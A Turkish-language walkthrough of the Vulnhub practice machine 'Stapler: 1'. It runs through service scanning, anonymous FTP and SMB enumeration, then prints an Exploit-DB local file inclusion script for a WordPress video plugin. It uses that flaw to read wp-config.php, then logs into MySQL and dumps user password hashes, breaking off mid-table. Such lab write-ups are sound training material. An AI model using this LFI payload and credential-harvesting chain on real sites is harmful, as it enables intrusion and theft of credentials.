İçeriğe geç

STAPLER: 1

Makine Hakkında Bilgiler

Açıklama:
Average beginner/intermediate VM, only a few twists
May find it easy/hard (depends on YOUR background)
...also which way you attack the box
It SHOULD work on both VMware and Virtualbox
REBOOT the VM if you CHANGE network modes
Fusion users, you'll need to retry when importing

Vulnhub Sayfası:
http://144.76.171.171/blog/index.php/fristileaks-1-3/

İndirme Sayfası: https://download.vulnhub.com/stapler/Stapler.zip

Walkthrough

İlk önce hedef makinenin ip adresini tespit ederek başlayalım.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ifconfig eth0                                                                                                                                       130 ⨯
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.21  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:fe4a:4d3f  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:4a:4d:3f  txqueuelen 1000  (Ethernet)
        RX packets 5680  bytes 995112 (971.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9958  bytes 1268241 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# arp-scan -l | grep 08:00:27:ba:ad:72
192.168.0.25    08:00:27:ba:ad:72   PCS Systemtechnik GmbH

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# 

Bir nmap taraması gerçekleştirelim.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# nmap 192.168.0.25 -p- -A    
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 19:44 EDT
Nmap scan report for 192.168.0.25
Host is up (0.0010s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsCompression, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x07{J\I;+o\x08\x03r\x17j\x16\x1F\x10m=\x16\x08
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.91%I=7%D=5/29%Time=60B2D232%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:BA:AD:72 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m58s, deviation: 34m37s, median: 2h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2021-05-30T03:46:06+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-30T02:46:05
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   1.03 ms 192.168.0.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.42 seconds

Şimdi bir değerlendirelim. ftp Anonymous login mevcut. ssh, http sunucularımız, mysql ve sambamız mevcut. Bilgi toplanacak çok fazla servis var. Hadi başlayalım.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ftp 192.168.0.25 
Connected to 192.168.0.25.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.0.25:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (37.0015 kB/s)
ftp> bye
221 Goodbye.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat note                                  
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Sanırım bazı kullanıcılar elde ettik. Daha sonrasında enum4linux taraması gerçekleştirdim. Çıktıları aşağıda:


 ========================================= 
|    Share Enumeration on 192.168.0.25    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    kathy           Disk      Fred, What are we doing here?
    tmp             Disk      All temporary files should be stored here
    IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.0.25
//192.168.0.25/print$   Mapping: DENIED, Listing: N/A
//192.168.0.25/kathy    Mapping: OK, Listing: OK
//192.168.0.25/tmp  Mapping: OK, Listing: OK
//192.168.0.25/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

...

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Kullanıcılar vepaylaşıma alınmış klasörler elde ettik. İnceleyelim.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# smbclient //192.168.0.25/kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 11:02:27 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (10.4 KiloBytes/sec) (average 10.4 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

        19478204 blocks of size 1024. 16397096 blocks available
smb: \> cd backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 11:04:14 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015

        19478204 blocks of size 1024. 16397096 blocks available
smb: \backup\> get vsftpd.conf
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (646.8 KiloBytes/sec) (average 392.3 KiloBytes/sec)
smb: \backup\> exit

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ls
note  todo-list.txt  vsftpd.conf

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat todo-list.txt                         
I'm making sure to backup anything important for Initech, Kathy
┌──(root💀kali)-[/home/kali/oscp/stapler/wordpress]
└─# smbclient //192.168.0.25/tmp  
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun  7 04:08:39 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  ls                                  N      274  Sun Jun  5 11:32:58 2016

smb: \> exit

┌──(root💀kali)-[/home/kali/oscp/stapler/wordpress]
└─# cat ls         
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

smb ile ilgili topladığım bilgiler yukarıda. Devam edelim.
Nikto aracı gerçekten hakkı teslim edilmesi gereken bir araç vermiş olduğu bilgiler işimi çok kolaylaştırdı.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# nikto -h http://192.168.0.25:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.25
+ Target Hostname:    192.168.0.25
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time:         2021-05-29 20:12:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.0.25' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-05-29 20:23:38 (GMT-4) (670 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Normalde http ile gittiğimde 400 kodu aldığım sunuya https ile gittiğimde 200 http kodunu alabildim. Bir wordpress sayfası tespit ettim ve wpscan ile API aracılığı ile bir tarama işlemi gerçekleştirdim. Burada bir sürü bulgu çıktı tabikide ancak en önelisi https://192.168.0.25:12380/blogblog/wp-content/plugins/ adresinde tespit ettiğim advanced-video-embed-embed-videos-or-playlists/ pluginiydi.

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# searchsploit advanced video wordpress
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                                 | php/webapps/39646.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# locate php/webapps/39646.py                             
/usr/share/exploitdb/exploits/php/webapps/39646.py
cp                                                                                                                                                                                                                                             
┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cp /usr/share/exploitdb/exploits/php/webapps/39646.py . 

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat 39646.py                                           
#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / WordPress 4.2.2

#   Timeline
#   03/24/2016 - Bug discovered
#   03/24/2016 - Initial notification of vendor
#   04/01/2016 - No answer from vendor, public release of bug 

# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);

# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default WordPress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
    numbers = re.findall(r'\d+',line)
    id = numbers[-1]
    id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls=re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()     

Bizimde pluginimizin sürümü 1 yani sürümler uyuşuyor. Ayrıca bununla alakalı bir exploit de mevcut. Kodu okuduktan sonra süreçleri kendim gerçekleştirdim. https://192.168.0.25:12380/blogblog//wp-admin/admin-ajax.php?action=ave_publishPost&title=1822&short=rnd&term=rnd&thumb=../wp-config.php şeklinde bir istek gerçekleştirdim. Daha sonrasında tarayıcı üzerinden https://192.168.0.25:12380/blogblog/wp-content/uploads/ klasörüne gidip oradaki resimleri kalime indirdim. Bu resim dosyalarını cat ile okuduğumda istediği verilere ulaşabildim.


┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# wget https://192.168.0.25:12380/blogblog/wp-content/uploads/1022270830.jpeg --no-check-certificate                                            
--2021-05-29 21:09:24--  https://192.168.0.25:12380/blogblog/wp-content/uploads/1022270830.jpeg
Connecting to 192.168.0.25:12380... connected.
WARNING: The certificate of ‘192.168.0.25’ is not trusted.
WARNING: The certificate of ‘192.168.0.25’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘192.168.0.25’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘1022270830.jpeg’

1022270830.jpeg                                             100%[========================================================================================================================================>]   2.97K  --.-KB/s    in 0s      

2021-05-29 21:09:24 (66.0 MB/s) - ‘1022270830.jpeg’ saved [3042/3042]

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# ls                                                                                                                                            
1022270830.jpeg  39646.py  cer.cer  note  todo-list.txt  vsftpd.conf  wordpress  wordpress-4.tar.gz  wpresult

┌──(root💀kali)-[/home/kali/oscp/stapler]
└─# cat 1022270830.jpeg                                                                                                                           
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

LFI ile wp-config.php dosyasının içeriğini elde etmiş olduk. Nmap çıktısında mysql servisi açıktı şimdi bu servise bağlanalım.

┌──(root💀kali)-[/home/kali]
└─# mysql -u root -h 192.168.0.25 -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.007 sec)

MySQL [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.002 sec)

MySQL [wordpress]> select * from ep_users;
ERROR 1146 (42S02): Table 'wordpress.ep_users' doesn't exist
MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass                          | user_nicename | user_email            | user_url         | user_registered     | user_activation_key | user_status | display_name    |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          | [email protected]    | http://localhost | 2016-06-03 23:18:47 |                     |           0 | John Smith      |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          | [email protected]    |                  | 2016-06-05 16:11:33 |                     |           0 | Elly Jones      |
|  3 | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter         | [email protected]   |                  | 2016-06-05 16:13:16 |                     |           0 | Peter Parker    |
|  4 | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry         | [email protected]   |                  | 2016-06-05 16:14:26 |                     |           0 | Barry Atkins    |
|  5 | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather       | [email protected] |                  | 2016-06-05 16:18:04 |                     |           0 | Heather Neville |
|  6 | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry         | [email protected]   |                  | 2016-06-05 16:18:23 |                     |           0 | garry           |
